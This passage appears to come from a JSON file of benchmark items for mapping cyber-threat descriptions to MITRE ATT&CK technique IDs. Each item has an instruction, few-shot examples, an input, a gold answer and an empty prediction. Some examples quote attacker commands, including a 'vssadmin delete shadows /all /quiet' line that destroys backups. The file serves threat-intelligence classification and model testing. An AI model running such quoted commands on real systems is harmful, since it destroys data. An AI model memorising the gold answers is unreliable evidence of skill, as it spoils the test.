models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: NETWIRE can copy itself to and launch itself from hidden folders.\n\t - T1564.001: Hide Artifacts - Hidden Files and Directories\n- Text: The results are Gzipped and saved under random file in the temp folder. Following successful collection of information, the data is send back to the C2 and the file is deleted\n\t - T1074.001: Data Staged - Local Data Staging\n\t - T1560.001: Archive Collected Data - Archive via Utility\n- Text: Regin has used a hidden file system to store some of its components.\n\t - T1564.005: Hide Artifacts - Hidden File System\n", + "input": "Micropsia creates a new hidden directory to store all components' outputs in a dedicated sub-folder for each.", + "gold": "- T1564.001: Hide Artifacts - Hidden Files and Directories", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Internal Reconnaissance APT40 uses compromised credentials to log on to other connected systems and conduct reconnaissance\n\t - T1021: Remote Services\n- Text: Darkhotel has used malware that repeatedly checks the mouse cursor position to determine if a real user is on the system.\n\t - T1497.002: Virtualization/Sandbox Evasion - User Activity Based Checks\n- Text: ZxShell supports functionality for VNC sessions.\n\t - T1021.005: Remote Services - VNC\n", + "input": "Kivars has the ability to remotely trigger keyboard input and mouse clicks.", + "gold": "- T1021: Remote Services", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: KARAE can use public cloud-based storage providers for command and control.\n\t - T1102.002: Web Service - Bidirectional Communication\n- Text: NETWIRE has used web services including Paste.ee to host payloads.\n\t - T1102: Web Service\n- Text: ZIRCONIUM has used GitHub to host malware linked in spearphishing e-mails.\n\t - T1583.006: Acquire Infrastructure - Web Services\n", + "input": "ROKRAT has used legitimate social networking sites and cloud platforms (including but not limited to Twitter, Yandex, Dropbox, and Mediafire) for C2 communications.", + "gold": "- T1102.002: Web Service - Bidirectional Communication", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: H1N1 has added a plethora of new functionality in comparison to earlier reports. Throughout this blog series we will be analyzing the capabilities of H1N1 including: obfuscation, a User Account Control (UAC) bypass, information stealing, data exfiltration, loader/dropper, and self-propagation/lateral movement techniques used by this variant.1,2\n\t - T1027: Obfuscated Files or Information\n- Text: Emotet has sent Microsoft Word documents with embedded macros that will invoke scripts to download additional payloads.\n\t - T1059.005: Command and Scripting Interpreter - Visual Basic\n- Text: This is not the first time Turla has used PowerShell in-memory loaders to increase its chances of bypassing security products. After a few months, Turla has improved these scripts and is now using them to load a wide range of custom malware from its traditional arsenal. PowerShell Loader . The PowerShell loader has three main steps: persistence, decryption and loading into memory of the embedded executable or library. It reads the Windows Registry key where the encrypted payload is stored, and contains the password and the salt needed to decrypt the payload. WMI consumer PowerShell command . Finally, the script stores the encrypted payload in the Windows registry. Hijacked profile.ps1 file . The base64-encoded PowerShell command is very similar to the one used in the WMI consumers. The key and the salt are also different for each script and are not stored in the script, but only in the WMI filter or in the profile.ps1 file. Patching of AmsiScanBuffer function . Payloads . The PowerShell scripts we have presented are generic components used to load various payloads, such as an RPC Backdoor and a PowerShell backdoor. We have seen operators use this backdoor for the following purposes: Conclusion . In a 2018 blogpost, we predicted that Turla would use more and more generic tools. Finally, the usage of open-source tools does not mean Turla has stopped using its custom tools\n\t - T1140: Deobfuscate/Decode Files or Information\n", + "input": "BackConfig has used compressed and decimal encoded VBS scripts.", + "gold": "- T1027: Obfuscated Files or Information", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: PLEAD also uses CVE-2017-7269, a buffer overflow vulnerability Microsoft Internet Information Services (IIS) 6.0 to compromise the victim\u2019s server. This is another way for them to establish a new C&C or HTTP server\n\t - T1190: Exploit Public-Facing Application\n- Text: POORAIM has been delivered through compromised sites acting as watering holes.\n\t - T1189: Drive-by Compromise\n- Text: Indrik Spider has served fake updates via legitimate websites that have been compromised.\n\t - T1584.004: Compromise Infrastructure - Server\n", + "input": "Night Dragon has performed SQL injection attacks of extranet web servers to gain access.", + "gold": "- T1190: Exploit Public-Facing Application", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: MechaFlounder begins by entering a loop that will continuously attempt to communicate with its C2 server. The Trojan will use HTTP to send an outbound beacon to its C2 server that contains the user's account name and hostname in the URL. The code, seen in Figure 2, builds the URL by concatenating the username and hostname with two dashes \"--\" between the two strings. The code then creates the URL string by using the username and hostname string twice with the back-slash \"\\\" character between the two and by appending the string \"-sample.html\n\t - T1041: Exfiltration Over C2 Channel\n- Text: may be used to exfiltrate data separate from the main command and control protocol.\n\t - T1048: Exfiltration Over Alternative Protocol\n- Text: Remsec can exfiltrate data via a DNS tunnel or email, separately from its C2 channel.\n\t - T1048.003: Exfiltration Over Alternative Protocol - Exfiltration Over Unencrypted Non-C2 Protocol\n", + "input": "HAWKBALL has sent system information and files over the C2 channel.", + "gold": "- T1041: Exfiltration Over C2 Channel", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Comnie Malware Family Comnie uses the RC4 algorithm in multiple locations both to obfuscate strings used by the malware, as well as for network communication. More information about how Comnie handles identified security products may be found in the technical analysis in the Appendix. Comnie is able to achieve persistence via a .lnk file that is stored within the victim\u2019s startup path. When originally run, Comnie will convert itself from an executable file to a DLL and will write this newly created DLL to the host machine\u2019s %APPDATA% directory. Unit 42 has observed a total of two variants of Comnie. In older variants, Comnie was found to look for the \u2018++a++\u2019 markers. The example C2s used by older variants of Comnie demonstrates this\n\t - T1547.001: Boot or Logon Autostart Execution - Registry Run Keys / Startup Folder\n- Text: BoxCaon established persistence by setting the \"HKEY_CURRENT_USER\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows\\load\" registry key to point to its executable.\n\t - T1547: Boot or Logon Autostart Execution\n- Text: LoJax has modified the Registry key \"\u2018HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Session Manager\\BootExecute\u2019\" from \"\u2018autocheck autochk *\u2019\" to \"\u2018autocheck autoche *\u2019\".\n\t - T1112: Modify Registry\n", + "input": "Chinoxy has established persistence via the `HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run` registry key and by loading a dropper to `(%COMMON_ STARTUP%\\\\eoffice.exe)`.", + "gold": "- T1547.001: Boot or Logon Autostart Execution - Registry Run Keys / Startup Folder", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: APT29 has used social media platforms to hide communications to C2 servers.\n\t - T1102.002: Web Service - Bidirectional Communication\n- Text: The Cloud Atlas implants utilize a rather unusual C&C mechanism. All the malware samples we\u2019ve seen communicate via HTTPS and WebDav with the same server \u201ccloudme.com\u201d, a cloud services provider. According to their website, CloudMe is owned and operated by CloudMe AB, a company based in Link\u00f6ping, Sweden\n\t - T1102: Web Service\n- Text: ZIRCONIUM has exfiltrated stolen data to Dropbox.\n\t - T1567.002: Exfiltration Over Web Service - Exfiltration to Cloud Storage\n", + "input": "Clambling can use Dropbox to download malicious payloads, send commands, and receive information.", + "gold": "- T1102.002: Web Service - Bidirectional Communication", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Babuk has the ability to delete shadow volumes using \"vssadmin.exe delete shadows /all /quiet\".\n\t - T1490: Inhibit System Recovery\n- Text: Gamaredon Group malware can insert malicious macros into documents using a \"Microsoft.Office.Interop\" object.\n\t - T1559.001: Inter-Process Communication - Component Object Model\n- Text: SILENTTRINITY can use `System` namespace methods to execute lateral movement using DCOM.\n\t - T1021.003: Remote Services - Distributed Component Object Model\n", + "input": "Diavol can delete shadow copies using the `IVssBackupComponents` COM object to call the `DeleteSnapshots` method.", + "gold": "- T1490: Inhibit System Recovery", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: APT39 has used CrackMapExec and a custom port scanner known as BLUETORCH for network scanning.\n\t - T1046: Network Service Discovery\n- Text: In order to encrypt network shares, BitPaymer will attempt to enumerate the sessions for each user logged onto the infected host and create a new process, using the token of each user. These new processes will first spawn a net.exe processing with the view argument to gather a list of network accessible hosts. For each host, BitPaymer spawns another net.exe process with command net view <host> using the newly discovered host as a parameter. This will return a list of network shares available to the impersonated user on the host. Once a list of all available shares has been gathered, BitPaymer attempts to mount them to be encrypted\n\t - T1135: Network Share Discovery\n\t - T1134.001: Access Token Manipulation - Token Impersonation/Theft\n- Text: Crutch can monitor for removable drives being plugged into the compromised machine.\n\t - T1120: Peripheral Device Discovery\n", + "input": "MURKYTOP has the capability to scan for open ports on hosts in a connected network.", + "gold": "- T1046: Network Service Discovery", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Since the FoggyWeb loader version.dll is an unmanaged application, it cannot directly access the virtual runtime environment that the managed AD FS code is executed within. The loader overcomes this limitation and loads the backdoor alongside the AD FS code by leveraging the CLR hosting interfaces and APIs to access the virtual runtime environment within which the AD FS code is executed\n\t - T1106: Native API\n- Text: PipeMon is a modular backdoor where each module is a single DLL exporting a function called IntelLoader and is loaded using a reflective loading technique. Each module exhibits different functionalities that are shown in Table 2\n\t - T1129: Shared Modules\n- Text: Lazarus Group has used a custom hashing method to resolve APIs used in shellcode.\n\t - T1027.007: Obfuscated Files or Information - Dynamic API Resolution\n", + "input": "BendyBear can load and execute modules and Windows Application Programming (API) calls using standard shellcode API hashing.", + "gold": "- T1106: Native API", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: The ROKRAT samples used during the two \"Evil New Year\" and the \"North Korean Human Rights\" campaigns contained a reconnaissance phase. The malware uses the following registry key to get the machine type: HKLM\\System\\CurrentControlSet\\Services\\mssmbios\\Data\\SMBiosData. The \"System manufacturer\" value is used to identify the type of machine. The source code only considers the following machine types\n\t - T1012: Query Registry\n- Text: The injected payload is known as Cobalt Strike Beacon and can be used to execute commands, inject other processes, elevate current processes or impersonate other processes, and upload and download files. The Get-NetComputer command from PowerView is renamed by the attackers to a random name\n\t - T1018: Remote System Discovery\n- Text: actors used the following command following exploitation of a machine with malware to obtain information about services: net start >> %temp%\\download\n\t - T1007: System Service Discovery\n", + "input": "RATANKBA uses the command \"reg query \u201cHKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\InternetSettings\u201d\".", + "gold": "- T1012: Query Registry", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Tropic Trooper has tested if the localhost network is available and other connection capability on an infected system using command scripts.\n\t - T1049: System Network Connections Discovery\n- Text: menuPass has used tcping.exe, similar to Ping, to probe port status on systems of interest.\n\t - T1046: Network Service Discovery\n- Text: APT29 used \"netsh\" to configure firewall rules that limited certain UDP outbound packets.\n\t - T1562.004: Impair Defenses - Disable or Modify System Firewall\n", + "input": "Remsec can obtain a list of active connections and open ports.", + "gold": "- T1049: System Network Connections Discovery", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: BRONZE BUTLER has used steganography in multiple operations to conceal malicious payloads.\n\t - T1027.003: Obfuscated Files or Information - Steganography\n- Text: One example of these samples is given below: SHA256:6500636c29eba70efd3eb3be1d094dfda4ec6cca52ace23d50e98e6b63308fdb The file is a self-extracting RAR, which is a common delivery mechanism for PlugX particularly when the eventual payload will be sideloaded by a legitimate executable\n\t - T1036: Masquerading\n- Text: SUPERNOVA contained Base64-encoded strings.\n\t - T1027: Obfuscated Files or Information\n", + "input": "Tropic Trooper has used JPG files with encrypted payloads to mask their backdoor routines and evade detection.", + "gold": "- T1027.003: Obfuscated Files or Information - Steganography", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: NanHaiShu encodes files in Base64.\n\t - T1027: Obfuscated Files or Information\n- Text: Part of packed VM PCODE After unpacking, the PCODE it will look like the following: Unpacked PCODE After unpacking the virtual machine PCODE is then decrypted: Decrypted VM PCODE The custom virtual machine supports a total of 34 instructions: Example of parsed PCODE In this example, the \u201c1b\u201d instruction is responsible for executing native code that is specified in parameter field\n\t - T1140: Deobfuscate/Decode Files or Information\n\t - T1027.001: Obfuscated Files or Information - Binary Padding\n\t - T1027.002: Obfuscated Files or Information - Software Packing\n\t - T1497: Virtualization/Sandbox Evasion\n- Text: Frankenstein has communicated with a C2 via an encrypted RC4 byte stream and AES-CBC.\n\t - T1573.001: Encrypted Channel - Symmetric Cryptography\n", + "input": "SDBbot has the ability to XOR the strings for its installer component with a hardcoded 128 byte key.", + "gold": "- T1027: Obfuscated Files or Information", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: For both the receiving of C2 commands and exfiltration, Remexi uses the Microsoft Background Intelligent Transfer Service (BITS) mechanism to communicate with the C2 over HTTP\n\t - T1071.001: Application Layer Protocol - Web Protocols\n\t - T1041: Exfiltration Over C2 Channel\n\t - T1071: Application Layer Protocol\n\t - T1132: Data Encoding\n- Text: Doki has used a script that gathers information from a hardcoded list of IP addresses and uploads to an Ngrok URL.\n\t - T1020: Automated Exfiltration\n- Text: Epic encrypts collected data using a public key framework before sending it over the C2 channel. Some variants encrypt the collected data with AES and encode it with base64 before transmitting it to the C2 server.\n\t - T1560: Archive Collected Data\n", + "input": "SUGARDUMP has sent stolen credentials and other data to its C2 server.", + "gold": "- T1041: Exfiltration Over C2 Channel", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: In July 2018, Unit 42 analyzed a targeted attack using a novel file type against at least one government agency in the Middle East. It was carried out by a previously unpublished threat group we track as DarkHydrus. Based on our telemetry, we were able to uncover additional artifacts leading us to believe this adversary group has been in operation with their current playbook since early 2016. Once opened, Excel will retrieve whatever object is at the URL inside the file. These files have most recently been found in use by criminals to deliver commodity RATs such as Flawed Ammyy. In DarkHydrus's case, the preferred payload retrieved in their previous attacks were exclusively open-source legitimate tools which they abuse for malicious purposes, such as Meterpreter and Cobalt Strike. However, in this instance, it appears that this group used a custom PowerShell based payload that we call RogueRobin\n\t - T1566.001: Phishing - Spearphishing Attachment\n- Text: TA551 has prompted users to enable macros within spearphishing attachments to install malware.\n\t - T1204.002: User Execution - Malicious File\n- Text: Magic Hound has sent malicious URL links through email to victims. In some cases the URLs were shortened or linked to Word documents with malicious macros that executed PowerShells scripts to download Pupy.\n\t - T1566.002: Phishing - Spearphishing Link\n", + "input": "APT29 has used spearphishing emails with an attachment to deliver files with exploits to initial victims.", + "gold": "- T1566.001: Phishing - Spearphishing Attachment", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: GrimAgent can base64 encode C2 replies.\n\t - T1132.001: Data Encoding - Standard Encoding\n- Text: used Base64 to encode C2 traffic.\n\t - T1132: Data Encoding\n- Text: The data exchanged between the module and the C&C is encrypted with a proprietary algorithm and then encoded as readable latin characters\n\t - T1132.002: Data Encoding - Non-Standard Encoding\n", + "input": "POWERSTATS encoded C2 traffic with base64.", + "gold": "- T1001: Data Obfuscation\n- T1132.001: Data Encoding - Standard Encoding", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: EnvyScout can write files to disk with JavaScript using a modified version of the open-source tool FileSaver.\n\t - T1059.007: Command and Scripting Interpreter - JavaScript\n- Text: Epic has overwritten the function pointer in the extra window memory of Explorer's Shell_TrayWnd in order to execute malicious code in the context of the explorer.exe process.\n\t - T1055.011: Process Injection - Extra Window Memory Injection\n- Text: executes functions using rundll32.exe.\n\t - T1218.011: System Binary Proxy Execution - Rundll32\n", + "input": "InvisiMole can use a JavaScript file as part of its execution chain.", + "gold": "- T1059.007: Command and Scripting Interpreter - JavaScript", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Emotet has been delivered by phishing emails containing attachments.\n\t - T1566.001: Phishing - Spearphishing Attachment\n- Text: Cardinal RAT is deployed using an interesting technique of compiling and executing a downloader via a malicious macro embedded within a Microsoft Excel file. The Excel files themselves contain lures that have financial themes. This threat has had a low volume of samples in the past two years, with 11 instances of Carp Downloader and 27 instances of Cardinal RAT observed\n\t - T1204.002: User Execution - Malicious File\n- Text: In 2018, CTU researchers observed several GOLD KINGSWOOD campaigns involving SpicyOmelette, a tool used by the group during initial exploitation of an organization. This sophisticated JavaScript remote access tool is generally delivered via phishing, and it uses multiple defense evasion techniques to hinder prevention and detection activities. GOLD KINGSWOOD delivered SpicyOmelette through a phishing email containing a shortened link that appeared to be a PDF document attachment. When clicked, the link used the Google AppEngine to redirect the system to a GOLD KINGSWOOD-controlled Amazon Web Services (AWS) URL that installed a signed JavaScript file, which was SpicyOmelette\n\t - T1566.002: Phishing - Spearphishing Link\n", + "input": "Molerats has sent phishing emails with malicious Microsoft Word and PDF attachments.", + "gold": "- T1566.001: Phishing - Spearphishing Attachment", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Similar to its dropper, the binary seeks to evade sandboxes. In addition to the previously described trick EvilBunny performs hook detection to trick environments which hook time retrieval APIs. These are NtQuerySystemTime, GetSystemTimeAsFileTime and GetTickCount. Every API is called twice to calculate a delta, while performing a sleep(1000) operation between iteration one and iteration two. This can only be the case if any of the three API\u2019s return values is modified by a system monitoring solution, like a sandbox\n\t - T1124: System Time Discovery\n- Text: Chimera has used the \"quser\" command to show currently logged on users.\n\t - T1033: System Owner/User Discovery\n- Text: The autonomous system name of the IP shows that the allocation is controlled by Serverius Holding B.V., which is an autonomous system name we have previously seen associated with the OilRig group\n\t - T1082: System Information Discovery\n", + "input": "SHARPSTATS has the ability to identify the current date and time on the compromised host.", + "gold": "- T1124: System Time Discovery", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: copies itself to the Startup folder to establish persistence.\n\t - T1547.001: Boot or Logon Autostart Execution - Registry Run Keys / Startup Folder\n- Text: creates a Registry subkey that registers a new system device.\n\t - T1112: Modify Registry\n\t - T1112: Modify Registry\n- Text: Rundll32.exe is used as a way of executing at the command-line.\n\t - T1218.011: System Binary Proxy Execution - Rundll32\n", + "input": "Magic Hound malware has used Registry Run keys to establish persistence.", + "gold": "- T1547.001: Boot or Logon Autostart Execution - Registry Run Keys / Startup Folder", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: MegaCortex v1 was executed manually by threat actors using a separate batch file to kill security processes and stop/disable services related to security, backup and shadow copies. That same batch file was subsequently used to execute the MegaCortex binary with a Base64 key as a command-line argument\n\t - T1489: Service Stop\n\t - T1562.001: Impair Defenses - Disable or Modify Tools\n- Text: JHUHUGIT uses a .bat file to execute a .dll.\n\t - T1059.003: Command and Scripting Interpreter - Windows Command Shell\n- Text: ShimRat has installed shim databases in the \"AppPatch\" folder.\n\t - T1546.011: Event Triggered Execution - Application Shimming\n", + "input": "Ember Bear has executed a batch script designed to disable Windows Defender on a compromised host.", + "gold": "- T1562.001: Impair Defenses - Disable or Modify Tools", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: We also analyzed further Gamaredon tools that have the ability to inject malicious macros and remote templates into existing Office documents. Tools linked to Gamaredon and discussed in this blogpost are detected as variants of MSIL/Pterodo, Win32/Pterodo or Win64/Pterodo by ESET\u2019s products. Contrary to other APT groups, the Gamaredon group seems to make no effort in trying to stay under the radar. It also saves to disk the malicious OTM file (Outlook VBA project) that contains a macro, the malicious email attachment and, in some cases, a list of recipients that the emails should be sent to. Office macro injection module \u2013 CodeBuilder . We analyzed different variants of malicious modules used by the Gamaredon group to inject malicious macros or remote templates into documents already present on the compromised system. Module updates . Interestingly, some of the custom tools described in Palo Alto Networks\u2019 2017 blogpost on Gamaredon are still being updated and in use today. C# compiler module . This .NET executable, similar to many other tools used by the Gamaredon group, uses obfuscation techniques such as junk code insertion and string obfuscation. As with many other tools used by the Gamaredon group, they come in four different coding languages: C/C++, C#, batch file and VBScript. Quality of execution . We were able to collect numerous different samples of malicious scripts, executables and documents used by the Gamaredon group throughout their campaigns. Conclusion . Despite the simplicity of most of their tools, the Gamaredon group also is capable of deploying some novelty, such as their Outlook VBA module\n\t - T1547.001: Boot or Logon Autostart Execution - Registry Run Keys / Startup Folder\n- Text: Valak has the ability to modify the Registry key \"HKCU\\Software\\ApplicationContainer\\Appsw64\" to store information regarding the C2 server and downloads.\n\t - T1112: Modify Registry\n- Text: Bumblebee can check the Registry for specific keys.\n\t - T1012: Query Registry\n", + "input": "Hancitor has added Registry Run keys to establish persistence.", + "gold": "- T1547.001: Boot or Logon Autostart Execution - Registry Run Keys / Startup Folder", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK 